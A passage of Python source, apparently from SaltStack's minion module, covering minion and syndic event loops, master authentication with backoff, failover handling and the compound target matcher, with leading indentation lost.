self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'minion_start'
)
# dup name spaced event
self._fire_master(
'Minion {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'minion'),
)
def _setsockopts(self):
if self.opts['zmq_filtering']:
# TODO: constants file for "broadcast"
self.socket.setsockopt(zmq.SUBSCRIBE, 'broadcast')
self.socket.setsockopt(zmq.SUBSCRIBE, self.hexid)
else:
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_ipv4only()
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
@property
def master_pub(self):
'''
Return the master publish port
'''
return 'tcp://{ip}:{port}'.format(ip=self.opts['master_ip'],
port=self.publish_port)
def authenticate(self, timeout=60, safe=True):
'''
Authenticate with the master, this method breaks the functional
paradigm, it will update the master information from a fresh sign
in, signing in can occur as often as needed to keep up with the
revolving master AES key.
'''
log.debug(
'Attempting to authenticate with the Salt Master at {0}'.format(
self.opts['master_ip']
)
)
auth = salt.crypt.Auth(self.opts)
self.tok = auth.gen_token('salt')
acceptance_wait_time = self.opts['acceptance_wait_time']
acceptance_wait_time_max = self.opts['acceptance_wait_time_max']
if not acceptance_wait_time_max:
acceptance_wait_time_max = acceptance_wait_time
while True:
creds = auth.sign_in(timeout, safe)
if creds == 'full':
return creds
elif creds != 'retry':
log.info('Authentication with master at {0} successful!'.format(self.opts['master_ip']))
break
log.info('Waiting for minion key to be accepted by the master.')
if acceptance_wait_time:
log.info('Waiting {0} seconds before retry.'.format(acceptance_wait_time))
time.sleep(acceptance_wait_time)
if acceptance_wait_time < acceptance_wait_time_max:
acceptance_wait_time += acceptance_wait_time
log.debug('Authentication wait time is {0}'.format(acceptance_wait_time))
self.aes = creds['aes']
if self.opts.get('syndic_master_publish_port'):
self.publish_port = self.opts.get('syndic_master_publish_port')
else:
self.publish_port = creds['publish_port']
self.crypticle = salt.crypt.Crypticle(self.opts, self.aes)
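    # Editorial note on the retry backoff above: with acceptance_wait_time = 10
    # and acceptance_wait_time_max = 60, the wait between sign-in attempts grows
    # 10 -> 20 -> 40 -> 80 seconds and then stays at 80, because the value stops
    # doubling only once it is no longer below acceptance_wait_time_max.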
def module_refresh(self, force_refresh=False):
'''
Refresh the functions and returners.
'''
self.functions, self.returners, _ = self._load_modules(force_refresh)
self.schedule.functions = self.functions
self.schedule.returners = self.returners
def pillar_refresh(self, force_refresh=False):
'''
Refresh the pillar
'''
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
).compile_pillar()
self.module_refresh(force_refresh)
def manage_schedule(self, package):
'''
Refresh the functions and returners.
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
func = data.get('func', None)
name = data.get('name', None)
schedule = data.get('schedule', None)
where = data.get('where', None)
if func == 'delete':
self.schedule.delete_job(name)
elif func == 'add':
self.schedule.add_job(schedule)
elif func == 'modify':
self.schedule.modify_job(name, schedule, where)
elif func == 'enable':
self.schedule.enable_schedule()
elif func == 'disable':
self.schedule.disable_schedule()
elif func == 'enable_job':
self.schedule.enable_job(name, where)
elif func == 'run_job':
self.schedule.run_job(name, where)
elif func == 'disable_job':
self.schedule.disable_job(name, where)
elif func == 'reload':
self.schedule.reload(schedule)
def environ_setenv(self, package):
'''
Set the salt-minion main process environment according to
the data contained in the minion event data
'''
tag, data = salt.utils.event.MinionEvent.unpack(package)
environ = data.get('environ', None)
if environ is None:
return False
false_unsets = data.get('false_unsets', False)
clear_all = data.get('clear_all', False)
import salt.modules.environ as mod_environ
return mod_environ.setenv(environ, false_unsets, clear_all)
def clean_die(self, signum, frame):
'''
        Python does not handle SIGTERM cleanly; if it is signaled, exit
        the minion process cleanly
'''
self._running = False
exit(0)
def _pre_tune(self):
'''
Set the minion running flag and issue the appropriate warnings if
the minion cannot be started or is already running
'''
if self._running is None:
self._running = True
elif self._running is False:
log.error(
'This {0} was scheduled to stop. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
elif self._running is True:
log.error(
'This {0} is already running. Not running '
'{0}.tune_in()'.format(self.__class__.__name__)
)
return
try:
log.info(
'{0} is starting as user \'{1}\''.format(
self.__class__.__name__,
salt.utils.get_user()
)
)
except Exception as err:
# Only windows is allowed to fail here. See #3189. Log as debug in
# that case. Else, error.
log.log(
salt.utils.is_windows() and logging.DEBUG or logging.ERROR,
'Failed to get the user who is starting {0}'.format(
self.__class__.__name__
),
exc_info=err
)
def _mine_send(self, package):
'''
Send mine data to the master
'''
channel = salt.transport.Channel.factory(self.opts)
load = salt.utils.event.SaltEvent.unpack(package)[1]
ret = channel.send(load)
return ret
def handle_event(self, package):
'''
Handle an event from the epull_sock (all local minion events)
'''
log.debug('Handling event {0!r}'.format(package))
if package.startswith('module_refresh'):
self.module_refresh()
elif package.startswith('pillar_refresh'):
self.pillar_refresh()
elif package.startswith('manage_schedule'):
self.manage_schedule(package)
elif package.startswith('grains_refresh'):
if self.grains_cache != self.opts['grains']:
self.pillar_refresh(force_refresh=True)
self.grains_cache = self.opts['grains']
elif package.startswith('environ_setenv'):
self.environ_setenv(package)
elif package.startswith('_minion_mine'):
self._mine_send(package)
elif package.startswith('fire_master'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding master event tag={tag}'.format(tag=data['tag']))
self._fire_master(data['data'], data['tag'], data['events'], data['pretag'])
elif package.startswith('__master_disconnected'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
# if the master disconnect event is for a different master, raise an exception
if data['master'] != self.opts['master']:
raise Exception()
if self.connected:
# we are not connected anymore
self.connected = False
# modify the scheduled job to fire only on reconnect
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master_ip': self.opts['master'],
'connected': False}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
log.info('Connection to master {0} lost'.format(self.opts['master']))
if self.opts['master_type'] == 'failover':
log.info('Trying to tune in to next master from master-list')
# if eval_master finds a new master for us, self.connected
                    # will be True again on successful master authentication
self.opts['master'] = self.eval_master(opts=self.opts,
failed=True)
if self.connected:
# re-init the subsystems to work with the new master
log.info('Re-initialising subsystems for new '
'master {0}'.format(self.opts['master']))
del self.socket
del self.context
del self.poller
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._set_reconnect_ivl()
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self.poller.register(self.epull_sock, zmq.POLLIN)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# update scheduled job to run with the new master addr
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master_ip': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('__master_connected'):
# handle this event only once. otherwise it will pollute the log
if not self.connected:
log.info('Connection to master {0} re-established'.format(self.opts['master']))
self.connected = True
# modify the __master_alive job to only fire,
# if the connection is lost again
schedule = {
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 2,
'kwargs': {'master_ip': self.opts['master'],
'connected': True}
}
self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('_salt_error'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
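    # Editorial sketch: handle_event() routes purely on the package/tag prefix.
    # For example, the watcher installed by _refresh_grains_watcher() schedules
    # event.fire({}, 'grains_refresh'); that event lands in the 'grains_refresh'
    # branch above, which refreshes pillar only when the cached grains differ
    # from the freshly loaded ones.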
# Main Minion Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Minion {0!r} trying to tune in'.format(self.opts['id']))
self._prepare_minion_event_system()
self.socket = self.context.socket(zmq.SUB)
self._set_reconnect_ivl()
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self.poller.register(self.epull_sock, zmq.POLLIN)
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = int(self.opts['loop_interval'])
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
ping_interval = self.opts.get('ping_interval', 0) * 60
ping_at = None
while self._running is True:
loop_interval = self.process_schedule(self, loop_interval)
try:
socks = self._do_poll(loop_interval)
if ping_interval > 0:
if socks or not ping_at:
ping_at = time.time() + ping_interval
if ping_at < time.time():
log.debug('Ping master')
self._fire_master('ping', 'minion_ping')
ping_at = time.time() + ping_interval
self._do_socket_recv(socks)
# Check the event system
if socks.get(self.epull_sock) == zmq.POLLIN:
package = self.epull_sock.recv(zmq.NOBLOCK)
try:
self.handle_event(package)
self.epub_sock.send(package)
except Exception:
log.debug('Exception while handling events', exc_info=True)
                # Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
except zmq.ZMQError as exc:
# The interrupt caused by python handling the
# SIGCHLD. Throws this error with errno == EINTR.
# Nothing to receive on the zmq socket throws this error
# with EAGAIN.
# Both are safe to ignore
if exc.errno != errno.EAGAIN and exc.errno != errno.EINTR:
log.critical('Unexpected ZMQError while polling minion',
exc_info=True)
continue
except SaltClientError:
raise
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
self._pre_tune()
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
self._fire_master_minion_start()
loop_interval = int(self.opts['loop_interval'])
# On first startup execute a state run if configured to do so
self._state_run()
while self._running is True:
try:
socks = self._do_poll(loop_interval)
self._do_socket_recv(socks)
# Check the event system
except zmq.ZMQError:
# If a zeromq error happens recover
yield True
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
yield True
def _do_poll(self, loop_interval):
log.trace('Check main poller timeout {0}'.format(loop_interval))
return dict(self.poller.poll(
loop_interval * 1000)
)
def _do_socket_recv(self, socks):
if socks.get(self.socket) == zmq.POLLIN:
# topic filtering is done at the zmq level, so we just strip it
messages = self.socket.recv_multipart(zmq.NOBLOCK)
messages_len = len(messages)
            # if it was one message, then it's old style
if messages_len == 1:
payload = self.serial.loads(messages[0])
# 2 includes a header which says who should do it
elif messages_len == 2:
payload = self.serial.loads(messages[1])
else:
                raise Exception(('Invalid number of messages ({0}) in zeromq pub '
                                 'message from master').format(messages_len))
log.trace('Handling payload')
self._handle_payload(payload)
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if getattr(self, 'poller', None) is not None:
if isinstance(self.poller.sockets, dict):
for socket in self.poller.sockets.keys():
if socket.closed is False:
socket.close()
self.poller.unregister(socket)
else:
for socket in self.poller.sockets:
if socket[0].closed is False:
socket[0].close()
self.poller.unregister(socket[0])
if hasattr(self, 'epub_sock') and self.epub_sock.closed is False:
self.epub_sock.close()
if hasattr(self, 'epull_sock') and self.epull_sock.closed is False:
self.epull_sock.close()
if hasattr(self, 'socket') and self.socket.closed is False:
self.socket.close()
if hasattr(self, 'context') and self.context.closed is False:
self.context.term()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
Make a Syndic minion, this minion will use the minion keys on the
master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
        # force auth_safemode True because Syndic doesn't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
def _handle_aes(self, load, sig=None):
'''
Takes the AES encrypted load, decrypts it, and runs the encapsulated
instructions
'''
# If the AES authentication has changed, re-authenticate
try:
data = self.crypticle.loads(load)
except AuthenticationError:
self.authenticate()
data = self.crypticle.loads(load)
# Verify that the publication is valid
if 'tgt' not in data or 'jid' not in data or 'fun' not in data \
or 'arg' not in data:
return
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
if 'user' in data:
log.debug(
'User {0[user]} Executing syndic command {0[fun]} with '
'jid {0[jid]}'.format(
data
)
)
else:
log.debug(
'Executing syndic command {0[fun]} with jid {0[jid]}'.format(
data
)
)
log.debug('Command details: {0}'.format(data))
self._handle_decoded_payload(data)
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
**kwargs)
def _setsockopts(self):
# no filters for syndication masters, unless we want to maintain a
# list of all connected minions and update the filter
self.socket.setsockopt(zmq.SUBSCRIBE, '')
self.socket.setsockopt(zmq.IDENTITY, self.opts['id'])
self._set_reconnect_ivl_max()
self._set_tcp_keepalive()
self._set_ipv4only()
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self._init_context_and_poller()
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
loop_interval = int(self.opts['loop_interval'])
self._fire_master_syndic_start()
while True:
try:
socks = dict(self.poller.poll(loop_interval * 1000))
if socks.get(self.socket) == zmq.POLLIN:
self._process_cmd_socket()
except zmq.ZMQError:
yield True
except Exception:
log.critical(
'An exception occurred while polling the minion',
exc_info=True
)
yield True
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic {0!r} trying to tune in'.format(self.opts['id']))
self._init_context_and_poller()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# register the event sub to the poller
self.poller.register(self.local.event.sub)
# Start with the publish socket
# Share the poller with the event object
self.socket = self.context.socket(zmq.SUB)
self._setsockopts()
self.socket.connect(self.master_pub)
self.poller.register(self.socket, zmq.POLLIN)
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
loop_interval = int(self.opts['loop_interval'])
self._reset_event_aggregation()
while True:
try:
# Do all the maths in seconds
timeout = loop_interval
if self.event_forward_timeout is not None:
timeout = min(timeout,
self.event_forward_timeout - time.time())
if timeout >= 0:
log.trace('Polling timeout: %f', timeout)
socks = dict(self.poller.poll(timeout * 1000))
else:
# This shouldn't really happen.
# But there's no harm being defensive
log.warning('Negative timeout in syndic main loop')
socks = {}
if socks.get(self.socket) == zmq.POLLIN:
self._process_cmd_socket()
if socks.get(self.local.event.sub) == zmq.POLLIN:
self._process_event_socket()
if self.event_forward_timeout is not None and \
self.event_forward_timeout < time.time():
self._forward_events()
# We don't handle ZMQErrors like the other minions
# I've put explicit handling around the receive calls
# in the process_*_socket methods. If we see any other
# errors they may need some kind of handling so log them
# for now.
except Exception:
log.critical(
'An exception occurred while polling the syndic',
exc_info=True
)
def _process_cmd_socket(self):
try:
messages = self.socket.recv_multipart(zmq.NOBLOCK)
messages_len = len(messages)
idx = None
if messages_len == 1:
idx = 0
elif messages_len == 2:
idx = 1
else:
raise SaltSyndicMasterError('Syndication master received message of invalid len ({0}/2)'.format(messages_len))
payload = self.serial.loads(messages[idx])
except zmq.ZMQError as e:
# Swallow errors for bad wakeups or signals needing processing
if e.errno != errno.EAGAIN and e.errno != errno.EINTR:
raise
log.trace('Handling payload')
self._handle_payload(payload)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
def _process_event_socket(self):
tout = time.time() + self.opts['syndic_max_event_process_time']
while tout > time.time():
try:
event = self.local.event.get_event_noblock()
except zmq.ZMQError as e:
# EAGAIN indicates no more events at the moment
# EINTR some kind of signal maybe someone trying
# to get us to quit so escape our timeout
if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
break
raise
log.trace('Got event {0}'.format(event['tag']))
if self.event_forward_timeout is None:
self.event_forward_timeout = (
time.time() + self.opts['syndic_event_forward_timeout']
)
if salt.utils.jid.is_jid(event['tag']) and 'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
continue
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_jid'.format(self.opts['master_job_cache'])
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
if 'master_id' in event['data']:
jdict['master_id'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid], '_syndic_return')
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
self.poller = None
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
class MultiSyndic(MinionBase):
'''
    Make a MultiSyndic minion. This minion relays jobs and returns from all
    minions connected to it to the list of masters it is connected to.
    Note: jobs are returned to the requesting master on a best-effort basis. Since
    zmq is used, if a job is fired and that master disconnects between the publish
    and the return, the return will sit in a zmq buffer in this Syndic, addressed
    to the original master.
    In addition, since these classes use a mix of blocking and non-blocking calls
    (with varying timeouts along the way), this daemon does not handle failure
    well: under most circumstances it will stall for ~60s while attempting to
    re-authenticate with the down master.
'''
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
def __init__(self, opts):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# create all of the syndics you need
self.master_syndics = {}
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self.master_syndics[master] = {'opts': s_opts,
'auth_wait': s_opts['acceptance_wait_time'],
'dead_until': 0}
self._connect_to_master(master)
# TODO: do we need all of this?
def _connect_to_master(self, master):
'''
Attempt to connect to master, including back-off for each one
return boolean of whether you connected or not
'''
if master not in self.master_syndics:
log.error('Unable to connect to {0}, not in the list of masters'.format(master))
return False
minion = self.master_syndics[master]
# if we need to be dead for a while, stay that way
if minion['dead_until'] > time.time():
return False
if time.time() - minion['auth_wait'] > minion.get('last', 0):
try:
t_minion = Syndic(minion['opts'],
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
)
self.master_syndics[master]['syndic'] = t_minion
self.master_syndics[master]['generator'] = t_minion.tune_in_no_block()
self.master_syndics[master]['auth_wait'] = self.opts['acceptance_wait_time']
self.master_syndics[master]['dead_until'] = 0
return True
except SaltClientError:
                log.error('Error while bringing up minion for multi-syndic. Is master {0} responding?'.format(master))
# re-use auth-wait as backoff for syndic
minion['dead_until'] = time.time() + minion['auth_wait']
if minion['auth_wait'] < self.opts['acceptance_wait_time_max']:
minion['auth_wait'] += self.opts['acceptance_wait_time']
return False
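    # --- Editor's note (illustrative, not part of the original source) ---
    # The reconnect back-off above reuses the auth settings: a failed connect
    # marks the master dead for `auth_wait` seconds, and `auth_wait` then grows
    # by `acceptance_wait_time` until it reaches `acceptance_wait_time_max`.
    # With hypothetical values acceptance_wait_time=10 and
    # acceptance_wait_time_max=60, repeated failures back off roughly as
    # 10s, 20s, 30s, 40s, 50s, 60s, 60s, ...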
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_dict in self.iter_master_options(master_id):
if 'syndic' not in syndic_dict:
continue
if syndic_dict['dead_until'] > time.time():
                log.error('Unable to call {0} on {1}, that syndic is dead for now'.format(func, master))
continue
try:
getattr(syndic_dict['syndic'], func)(*args, **kwargs)
return
except SaltClientError:
                log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
# re-use auth-wait as backoff for syndic
syndic_dict['dead_until'] = time.time() + syndic_dict['auth_wait']
if syndic_dict['auth_wait'] < self.opts['acceptance_wait_time_max']:
syndic_dict['auth_wait'] += self.opts['acceptance_wait_time']
continue
log.critical('Unable to call {0} on any masters!'.format(func))
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self.master_syndics.keys())
shuffle(masters)
if master_id not in self.master_syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self.master_syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
self.event_forward_timeout = None
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic {0!r} trying to tune in'.format(self.opts['id']))
# Share the poller with the event object
self.poller = self.local.event.poller
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
loop_interval = int(self.opts['loop_interval'])
self._reset_event_aggregation()
while True:
try:
# Do all the maths in seconds
timeout = loop_interval
if self.event_forward_timeout is not None:
timeout = min(timeout,
self.event_forward_timeout - time.time())
if timeout >= 0:
log.trace('Polling timeout: %f', timeout)
socks = dict(self.poller.poll(timeout * 1000))
else:
# This shouldn't really happen.
# But there's no harm being defensive
log.warning('Negative timeout in syndic main loop')
socks = {}
# check all of your master_syndics, have them do their thing
for master_id, syndic_dict in self.master_syndics.items():
# if not connected, lets try
if 'generator' not in syndic_dict:
# if we couldn't connect, lets try later
if not self._connect_to_master(master_id):
continue
next(syndic_dict['generator'])
# events
if socks.get(self.local.event.sub) == zmq.POLLIN:
self._process_event_socket()
if (self.event_forward_timeout is not None and
self.event_forward_timeout < time.time()):
self._forward_events()
# We don't handle ZMQErrors like the other minions
# I've put explicit handling around the receive calls
# in the process_*_socket methods. If we see any other
# errors they may need some kind of handling so log them
# for now.
except Exception:
log.critical(
'An exception occurred while polling the syndic',
exc_info=True
)
def _process_event_socket(self):
tout = time.time() + self.opts['syndic_max_event_process_time']
while tout > time.time():
try:
event = self.local.event.get_event_noblock()
except zmq.ZMQError as e:
# EAGAIN indicates no more events at the moment
# EINTR some kind of signal maybe someone trying
# to get us to quit so escape our timeout
if e.errno == errno.EAGAIN or e.errno == errno.EINTR:
break
raise
log.trace('Got event {0}'.format(event['tag']))
if self.event_forward_timeout is None:
self.event_forward_timeout = (
time.time() + self.opts['syndic_event_forward_timeout']
)
if salt.utils.jid.is_jid(event['tag']) and 'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
continue
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_jid'.format(self.opts['master_job_cache'])
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic')},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub', args=(jid_ret, '_syndic_return'), master_id=jid_ret.get('__master_id__'))
self._reset_event_aggregation()
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, str):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
self.functions = salt.loader.minion_mods(self.opts)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on ip address or CIDR notation
'''
num_parts = len(tgt.split('/'))
if num_parts > 2:
# Target is not valid CIDR
return False
elif num_parts == 2:
# Target is CIDR
return salt.utils.network.in_subnet(
tgt,
addrs=self.opts['grains'].get('ipv4', [])
)
else:
# Target is an IPv4 address
import socket
try:
socket.inet_aton(tgt)
except socket.error:
# Not a valid IPv4 address
return False
else:
return tgt in self.opts['grains'].get('ipv4', [])
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, string_types):
log.debug('Compound target received that is not a string')
return False
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'L': 'list',
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
tokens = tgt.split()
for match in tokens:
            # Try to match tokens from the compound target, first by using
            # the 'G, P, I, L, S, E' matcher types, then by hostname glob.
if '@' in match and match[1] == '@':
comps = match.split('@')
matcher = ref.get(comps[0])
if not matcher:
# If an unknown matcher is called at any time, fail out
return False
results.append(
str(
getattr(self, '{0}_match'.format(matcher))(
'@'.join(comps[1:])
)
)
)
elif match in opers:
# We didn't match a target, so append a boolean operator or
# subexpression
if results or match in ['(', ')']:
